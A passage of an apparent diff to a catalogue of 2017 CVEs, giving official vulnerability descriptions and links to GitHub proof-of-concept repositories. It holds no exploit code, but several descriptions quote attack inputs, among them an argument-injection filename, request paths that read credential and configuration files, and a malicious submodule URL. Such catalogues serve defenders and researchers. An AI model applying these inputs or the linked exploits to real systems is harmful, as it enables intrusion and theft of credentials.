[0xxon/roca](https://github.com/0xxon/roca) +- [Elbarbons/ROCA-attack-on-vulnerability-CVE-2017-15361](https://github.com/Elbarbons/ROCA-attack-on-vulnerability-CVE-2017-15361) + +### CVE-2017-15394 (2018-02-07) + +Insufficient Policy Enforcement in Extensions in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to perform domain spoofing in permission dialogs via IDN homographs in a crafted Chrome Extension. + + +- [sudosammy/CVE-2017-15394](https://github.com/sudosammy/CVE-2017-15394) + +### CVE-2017-15428 (2019-01-09) + +Insufficient data validation in V8 builtins string generator could lead to out of bounds read and write access in V8 in Google Chrome prior to 62.0.3202.94 and allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. + + +- [w1ldb1t/CVE-2017-15428](https://github.com/w1ldb1t/CVE-2017-15428) + +### CVE-2017-15708 (2017-12-11) + +In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version. + + +- [HuSoul/CVE-2017-15708](https://github.com/HuSoul/CVE-2017-15708) + +### CVE-2017-15715 (2018-03-26) + +In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename. + + +- [whisp1830/CVE-2017-15715](https://github.com/whisp1830/CVE-2017-15715) + +### CVE-2017-15944 (2017-12-11) + +Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + + +- [xxnbyy/CVE-2017-15944-POC](https://github.com/xxnbyy/CVE-2017-15944-POC) +- [surajraghuvanshi/PaloAltoRceDetectionAndExploit](https://github.com/surajraghuvanshi/PaloAltoRceDetectionAndExploit) +- [yukar1z0e/CVE-2017-15944](https://github.com/yukar1z0e/CVE-2017-15944) +- [3yujw7njai/PaloAlto_EXP](https://github.com/3yujw7njai/PaloAlto_EXP) + +### CVE-2017-15950 (2017-10-31) + +Flexense SyncBreeze Enterprise version 10.1.16 is vulnerable to a buffer overflow that can be exploited for arbitrary code execution. The flaw is triggered by providing a long input into the "Destination directory" field, either within an XML document or through use of passive mode. + + +- [rnnsz/CVE-2017-15950](https://github.com/rnnsz/CVE-2017-15950) + +### CVE-2017-16082 (2018-06-07) + +A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious. + + +- [nulldreams/CVE-2017-16082](https://github.com/nulldreams/CVE-2017-16082) + +### CVE-2017-16088 (2018-06-07) + +The safe-eval module describes itself as a safer version of eval. By accessing the object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox. + + +- [Flyy-yu/CVE-2017-16088](https://github.com/Flyy-yu/CVE-2017-16088) + +### CVE-2017-16245 +- [AOCorsaire/CVE-2017-16245](https://github.com/AOCorsaire/CVE-2017-16245) + +### CVE-2017-16524 (2017-11-06) + +Web Viewer 1.0.0.193 on Samsung SRN-1670D devices suffers from an Unrestricted file upload vulnerability: 'network_ssl_upload.php' allows remote authenticated attackers to upload and execute arbitrary PHP code via a filename with a .php extension, which is then accessed via a direct request to the file in the upload/ directory. To authenticate for this attack, one can obtain web-interface credentials in cleartext by leveraging the existing Local File Read Vulnerability referenced as CVE-2015-8279, which allows remote attackers to read the web-interface credentials via a request for the cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI. + + +- [realistic-security/CVE-2017-16524](https://github.com/realistic-security/CVE-2017-16524) + +### CVE-2017-16541 (2017-11-04) + +Tor Browser before 7.0.9 on macOS and Linux allows remote attackers to bypass the intended anonymity feature and discover a client IP address via vectors involving a crafted web site that leverages file:// mishandling in Firefox, aka TorMoil. NOTE: Tails is unaffected. + + +- [Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541](https://github.com/Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541) + +### CVE-2017-16567 (2017-11-09) + +Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a "favorite." + + +- [dewankpant/CVE-2017-16567](https://github.com/dewankpant/CVE-2017-16567) + +### CVE-2017-16568 (2017-11-09) + +Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a radio URL. + + +- [dewankpant/CVE-2017-16568](https://github.com/dewankpant/CVE-2017-16568) + +### CVE-2017-16651 (2017-11-09) + +Roundcube Webmail before 1.1.10, 1.2.x before 1.2.7, and 1.3.x before 1.3.3 allows unauthorized access to arbitrary files on the host's filesystem, including configuration files, as exploited in the wild in November 2017. The attacker must be able to authenticate at the target system with a valid username/password as the attack requires an active session. The issue is related to file-based attachment plugins and _task=settings&_action=upload-display&_from=timezone requests. + + +- [ropbear/CVE-2017-16651](https://github.com/ropbear/CVE-2017-16651) +- [sephiroth950911/CVE-2017-16651-Exploit](https://github.com/sephiroth950911/CVE-2017-16651-Exploit) + +### CVE-2017-16720 (2018-01-05) + +A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device. + + +- [CN016/WebAccess-CVE-2017-16720-](https://github.com/CN016/WebAccess-CVE-2017-16720-) + +### CVE-2017-16744 (2018-08-20) + +A path traversal vulnerability in Tridium Niagara AX Versions 3.8 and prior and Niagara 4 systems Versions 4.4 and prior installed on Microsoft Windows Systems can be exploited by leveraging valid platform (administrator) credentials. + + +- [GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara](https://github.com/GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara) + +### CVE-2017-16778 (2019-12-24) + +An access control weakness in the DTMF tone receiver of Fermax Outdoor Panel allows physical attackers to inject a Dual-Tone-Multi-Frequency (DTMF) tone to invoke an access grant that would allow physical access to a restricted floor/level. By design, only a residential unit owner may allow such an access grant. However, due to incorrect access control, an attacker could inject it via the speaker unit to perform an access grant to gain unauthorized access, as demonstrated by a loud DTMF tone representing '1' and a long '#' (697 Hz and 1209 Hz, followed by 941 Hz and 1477 Hz). + + +- [breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection](https://github.com/breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection) + +### CVE-2017-16806 (2017-11-13) + +The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal. + + +- [rickoooooo/ulteriusExploit](https://github.com/rickoooooo/ulteriusExploit) + +### CVE-2017-16943 (2017-11-25) + +The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands. + + +- [beraphin/CVE-2017-16943](https://github.com/beraphin/CVE-2017-16943) + +### CVE-2017-16994 (2017-11-27) + +The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. + + +- [jedai47/CVE-2017-16994](https://github.com/jedai47/CVE-2017-16994) + +### CVE-2017-16995 (2017-12-22) + +The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension. + + +- [C0dak/CVE-2017-16995](https://github.com/C0dak/CVE-2017-16995) +- [Al1ex/CVE-2017-16995](https://github.com/Al1ex/CVE-2017-16995) +- [gugronnier/CVE-2017-16995](https://github.com/gugronnier/CVE-2017-16995) +- [senyuuri/cve-2017-16995](https://github.com/senyuuri/cve-2017-16995) +- [vnik5287/CVE-2017-16995](https://github.com/vnik5287/CVE-2017-16995) +- [littlebin404/CVE-2017-16995](https://github.com/littlebin404/CVE-2017-16995) +- [Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-](https://github.com/Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-) +- [ph4ntonn/CVE-2017-16995](https://github.com/ph4ntonn/CVE-2017-16995) +- [ivilpez/cve-2017-16995.c](https://github.com/ivilpez/cve-2017-16995.c) +- [fei9747/CVE-2017-16995](https://github.com/fei9747/CVE-2017-16995) +- [anldori/CVE-2017-16995](https://github.com/anldori/CVE-2017-16995) +- [mareks1007/cve-2017-16995](https://github.com/mareks1007/cve-2017-16995) +- [ZhiQiAnSecFork/cve-2017-16995](https://github.com/ZhiQiAnSecFork/cve-2017-16995) + +### CVE-2017-16997 (2017-12-18) + +elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretion of an empty RPATH/RUNPATH token as the "./" directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution. + + +- [Xiami2012/CVE-2017-16997-poc](https://github.com/Xiami2012/CVE-2017-16997-poc) + +### CVE-2017-17058 (2017-11-29) + +The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that Directory Traversal is not possible because all of the template files have "if (!defined('ABSPATH')) {exit;}" code + + +- [fu2x2000/CVE-2017-17058-woo_exploit](https://github.com/fu2x2000/CVE-2017-17058-woo_exploit) + +### CVE-2017-17099 (2017-12-03) + +There exists an unauthenticated SEH based Buffer Overflow vulnerability in the HTTP server of Flexense SyncBreeze Enterprise v10.1.16. When sending a GET request with an excessive length, it is possible for a malicious user to overwrite the SEH record and execute a payload that would run under the Windows SYSTEM account. + + +- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development) + +### CVE-2017-17215 (2018-03-20) + +Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code. + + +- [1337g/CVE-2017-17215](https://github.com/1337g/CVE-2017-17215) +- [wilfred-wulbou/HG532d-RCE-Exploit](https://github.com/wilfred-wulbou/HG532d-RCE-Exploit) +- [ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215](https://github.com/ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215) + +### CVE-2017-17275 +- [kd992102/CVE-2017-17275](https://github.com/kd992102/CVE-2017-17275) + +### CVE-2017-17309 (2018-06-14) + +Huawei HG255s-10 V100R001C163B025SP02 has a path traversal vulnerability due to insufficient validation of the received HTTP requests, a remote attacker may access the local files on the device without authentication. + + +- [exploit-labs/huawei_hg255s_exploit](https://github.com/exploit-labs/huawei_hg255s_exploit) + +### CVE-2017-17485 (2018-01-10) + +FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath. + + +- [tafamace/CVE-2017-17485](https://github.com/tafamace/CVE-2017-17485) +- [x7iaob/cve-2017-17485](https://github.com/x7iaob/cve-2017-17485) +- [Al1ex/CVE-2017-17485](https://github.com/Al1ex/CVE-2017-17485) + +### CVE-2017-17562 (2017-12-12) + +Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0. + + +- [1337g/CVE-2017-17562](https://github.com/1337g/CVE-2017-17562) +- [ivanitlearning/CVE-2017-17562](https://github.com/ivanitlearning/CVE-2017-17562) +- [crispy-peppers/Goahead-CVE-2017-17562](https://github.com/crispy-peppers/Goahead-CVE-2017-17562) +- [nu11pointer/goahead-rce-exploit](https://github.com/nu11pointer/goahead-rce-exploit) +- [freitzzz/bash-CVE-2017-17562](https://github.com/freitzzz/bash-CVE-2017-17562) + +### CVE-2017-17692 (2017-12-21) + +Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code that redirects to a child tab and rewrites the innerHTML property. + + +- [specloli/CVE-2017-17692](https://github.com/specloli/CVE-2017-17692) + +### CVE-2017-17736 (2018-03-23) + +Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 allows remote attackers to obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard. + + +- [0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736](https://github.com/0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736) + +### CVE-2017-17917 (2017-12-29) + +SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter. NOTE: The vendor disputes this issue because the documentation states that this method is not intended for use with untrusted input + + +- [matiasarenhard/rails-cve-2017-17917](https://github.com/matiasarenhard/rails-cve-2017-17917) + +### CVE-2017-18019 (2018-01-04) + +In K7 Total Security before 15.1.0.305, user-controlled input to the K7Sentry device is not sufficiently sanitized: the user-controlled input can be used to compare an arbitrary memory address with a fixed value, which in turn can be used to read the contents of arbitrary memory. Similarly, the product crashes upon a \\.\K7Sentry DeviceIoControl call with an invalid kernel pointer. + + +- [SpiralBL0CK/CVE-2017-18019](https://github.com/SpiralBL0CK/CVE-2017-18019) + +### CVE-2017-18044 (2018-01-19) + +A Command Injection issue was discovered in ContentStore/Base/CVDataPipe.dll in Commvault before v11 SP6. A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon. This is a different vulnerability than CVE-2017-3195. + + +- [securifera/CVE-2017-18044-Exploit](https://github.com/securifera/CVE-2017-18044-Exploit) + +### CVE-2017-18345 (2018-08-26) + +The Joomanager component through 2.0.0 for Joomla! has an arbitrary file download issue, resulting in exposing the credentials of the database via an index.php?option=com_joomanager&controller=details&task=download&path=configuration.php request. + + +- [Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD](https://github.com/Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD) + +### CVE-2017-18349 (2018-10-23) + +parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java. + + +- [h0cksr/Fastjson--CVE-2017-18349-](https://github.com/h0cksr/Fastjson--CVE-2017-18349-) + +### CVE-2017-18486 (2019-08-09) + +Jitbit Helpdesk before 9.0.3 allows remote attackers to escalate privileges because of mishandling of the User/AutoLogin userHash parameter. By inspecting the token value provided in a password reset link, a user can leverage a weak PRNG to recover the shared secret used by the server for remote authentication. The shared secret can be used to escalate privileges by forging new tokens for any user. These tokens can be used to automatically log in as the affected user. + + +- [Kc57/JitBit_Helpdesk_Auth_Bypass](https://github.com/Kc57/JitBit_Helpdesk_Auth_Bypass) + +### CVE-2017-18635 (2019-09-25) + +An XSS vulnerability was discovered in noVNC before 0.6.2 in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server name. + + +- [ShielderSec/CVE-2017-18635](https://github.com/ShielderSec/CVE-2017-18635) + +### CVE-2017-20165 (2023-01-09) + +Es wurde eine Schwachstelle in debug-js debug bis 3.0.x entdeckt. Sie wurde als problematisch eingestuft. Es betrifft die Funktion useColors der Datei src/node.js. Durch Manipulieren des Arguments str mit unbekannten Daten kann eine inefficient regular expression complexity-Schwachstelle ausgenutzt werden. Ein Aktualisieren auf die Version 3.1.0 vermag dieses Problem zu lösen. Der Patch wird als c38a0166c266a679c8de012d4eaccec3f944e685 bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [fastify/send](https://github.com/fastify/send) + +### CVE-2017-98505 +- [mike-williams/Struts2Vuln](https://github.com/mike-williams/Struts2Vuln) + +### CVE-2017-1000000 +- [smythtech/DWF-CVE-2017-1000000](https://github.com/smythtech/DWF-CVE-2017-1000000) + +### CVE-2017-1000028 (2017-07-13) + +Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. + + +- [NeonNOXX/CVE-2017-1000028](https://github.com/NeonNOXX/CVE-2017-1000028) + +### CVE-2017-1000083 (2017-09-05) + +backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename. + + +- [matlink/evince-cve-2017-1000083](https://github.com/matlink/evince-cve-2017-1000083) +- [matlink/cve-2017-1000083-atril-nautilus](https://github.com/matlink/cve-2017-1000083-atril-nautilus) + +### CVE-2017-1000112 (2017-10-04) + +Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch. When building a UFO packet with MSG_MORE __ip_append_data() calls ip_ufo_append_data() to append. However in between two send() calls, the append path can be switched from UFO to non-UFO one, which leads to a memory corruption. In case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len becomes negative on the non-UFO path and the branch to allocate new skb is taken. This triggers fragmentation and computation of fraggap = skb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy = datalen - transhdrlen - fraggap to become negative. Subsequently skb_copy_and_csum_bits() writes out-of-bounds. A similar issue is present in IPv6 code. The bug was introduced in e89e9cf539a2 ("[IPv4/IPv6]: UFO Scatter-gather approach") on Oct 18 2005. + + +- [hikame/docker_escape_pwn](https://github.com/hikame/docker_escape_pwn) +- [ol0273st-s/CVE-2017-1000112-Adpated](https://github.com/ol0273st-s/CVE-2017-1000112-Adpated) +- [IT19083124/SNP-Assignment](https://github.com/IT19083124/SNP-Assignment) + +### CVE-2017-1000117 (2017-10-04) + +A malicious third-party can give a crafted "ssh://..." URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running "git clone --recurse-submodules" to trigger the vulnerability. + + +- [timwr/CVE-2017-1000117](https://github.com/timwr/CVE-2017-1000117) +- [Manouchehri/CVE-2017-1000117](https://github.com/Manouchehri/CVE-2017-1000117) +- [thelastbyte/CVE-2017-1000117](https://github.com/thelastbyte/CVE-2017-1000117) +- [alilangtest/CVE-2017-1000117](https://github.com/alilangtest/CVE-2017-1000117) +- [VulApps/CVE-2017-1000117](https://github.com/VulApps/CVE-2017-1000117) +- [greymd/CVE-2017-1000117](https://github.com/greymd/CVE-2017-1000117) +- [shogo82148/Fix-CVE-2017-1000117](https://github.com/shogo82148/Fix-CVE-2017-1000117) +- [sasairc/CVE-2017-1000117_wasawasa](https://github.com/sasairc/CVE-2017-1000117_wasawasa) +- [Shadow5523/CVE-2017-1000117-test](https://github.com/Shadow5523/CVE-2017-1000117-test) +- [ieee0824/CVE-2017-1000117](https://github.com/ieee0824/CVE-2017-1000117) +- [rootclay/CVE-2017-1000117](https://github.com/rootclay/CVE-2017-1000117) +- [ieee0824/CVE-2017-1000117-sl](https://github.com/ieee0824/CVE-2017-1000117-sl) +- [takehaya/CVE-2017-1000117](https://github.com/takehaya/CVE-2017-1000117) +- [ikmski/CVE-2017-1000117](https://github.com/ikmski/CVE-2017-1000117) +- [nkoneko/CVE-2017-1000117](https://github.com/nkoneko/CVE-2017-1000117) +- [chenzhuo0618/test](https://github.com/chenzhuo0618/test) +- [siling2017/CVE-2017-1000117](https://github.com/siling2017/CVE-2017-1000117) +- [Q2h1Cg/CVE-2017-1000117](https://github.com/Q2h1Cg/CVE-2017-1000117) +- [cved-sources/cve-2017-1000117](https://github.com/cved-sources/cve-2017-1000117) +- [leezp/CVE-2017-1000117](https://github.com/leezp/CVE-2017-1000117) +- [AnonymKing/CVE-2017-1000117](https://github.com/AnonymKing/CVE-2017-1000117) +- [Jerry-zhuang/CVE-2017-1000117](https://github.com/Jerry-zhuang/CVE-2017-1000117) + +### CVE-2017-1000170 (2017-11-17) + +jqueryFileTree 2.1.5 and older Directory Traversal + + +- [Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal](https://github.com/Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal) + +### CVE-2017-1000250 (2017-09-12) + +All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests. + + +- [olav-st/CVE-2017-1000250-PoC](https://github.com/olav-st/CVE-2017-1000250-PoC) + +### CVE-2017-1000251 (2017-09-12) + +The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 2.6.32 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space. + + +- [hayzamjs/Blueborne-CVE-2017-1000251](https://github.com/hayzamjs/Blueborne-CVE-2017-1000251) +- [tlatkdgus1/blueborne-CVE-2017-1000251](https://github.com/tlatkdgus1/blueborne-CVE-2017-1000251) +- [own2pwn/blueborne-CVE-2017-1000251-POC](https://github.com/own2pwn/blueborne-CVE-2017-1000251-POC) +- [istanescu/CVE-2017-1000251_Exploit](https://github.com/istanescu/CVE-2017-1000251_Exploit) +- [sgxgsx/blueborne-CVE-2017-1000251](https://github.com/sgxgsx/blueborne-CVE-2017-1000251) + +### CVE-2017-1000253 (2017-10-04) + +Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015). This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the are that is supposed to be the "gap" between the stack and the binary. + + +- [RicterZ/PIE-Stack-Clash-CVE-2017-1000253](https://github.com/RicterZ/PIE-Stack-Clash-CVE-2017-1000253) +- [sxlmnwb/CVE-2017-1000253](https://github.com/sxlmnwb/CVE-2017-1000253) + +### CVE-2017-1000353 (2018-01-29) + +Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default. + + +- [vulhub/CVE-2017-1000353](https://github.com/vulhub/CVE-2017-1000353) +- [r00t4dm/Jenkins-CVE-2017-1000353](https://github.com/r00t4dm/Jenkins-CVE-2017-1000353) + +### CVE-2017-1000367 (2017-06-05) + +Todd Miller's sudo version 1.8.20 and earlier is vulnerable to an input validation (embedded spaces) in the get_process_ttyname() function resulting in information disclosure and command execution. + + +- [c0d3z3r0/sudo-CVE-2017-1000367](https://github.com/c0d3z3r0/sudo-CVE-2017-1000367) +- [homjxi0e/CVE-2017-1000367](https://github.com/homjxi0e/CVE-2017-1000367) +- [pucerpocok/sudo_exploit](https://github.com/pucerpocok/sudo_exploit) + +### CVE-2017-1000371 (2017-06-19) + +The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to i386 based systems. + + +- [Trinadh465/linux-4.1.15_CVE-2017-1000371](https://github.com/Trinadh465/linux-4.1.15_CVE-2017-1000371) + +### CVE-2017-1000405 (2017-11-30) + +The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original "Dirty cow" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp. + + +- [bindecy/HugeDirtyCowPOC](https://github.com/bindecy/HugeDirtyCowPOC) + +### CVE-2017-1000475 (2018-01-24) + +FreeSSHd 1.3.1 version is vulnerable to an Unquoted Path Service allowing local users to launch processes with elevated privileges. + + +- [lajarajorge/CVE-2017-1000475](https://github.com/lajarajorge/CVE-2017-1000475) + +### CVE-2017-1000486 (2018-01-03) + +Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution + + +- [pimps/CVE-2017-1000486](https://github.com/pimps/CVE-2017-1000486) +- [mogwailabs/CVE-2017-1000486](https://github.com/mogwailabs/CVE-2017-1000486) +- [cved-sources/cve-2017-1000486](https://github.com/cved-sources/cve-2017-1000486) +- [Pastea/CVE-2017-1000486](https://github.com/Pastea/CVE-2017-1000486) +- [oppsec/pwnfaces](https://github.com/oppsec/pwnfaces) +- [LongWayHomie/CVE-2017-1000486](https://github.com/LongWayHomie/CVE-2017-1000486) +- [jam620/primefaces](https://github.com/jam620/primefaces) + +### CVE-2017-1000499 (2018-01-03) + +phpMyAdmin versions 4.7.x (prior to 4.7.6.1/4.7.7) are vulnerable to a CSRF weakness. By deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables etc. + + +- [Villaquiranm/5MMISSI-CVE-2017-1000499](https://github.com/Villaquiranm/5MMISSI-CVE-2017-1000499) + +### CVE-2017-1002101 (2018-03-13) + +In Kubernetes versions 1.3.x, 1.4.x, 1.5.x, 1.6.x and prior to versions 1.7.14, 1.8.9 and 1.9.4 containers using subpath volume mounts with any volume type (including non-privileged pods, subject to file permissions) can access files/directories outside of the volume, including the host's filesystem. + + +- [bgeesaman/subpath-exploit](https://github.com/bgeesaman/subpath-exploit) + ## 2016 ### CVE-2016-0034 (2016-01-13)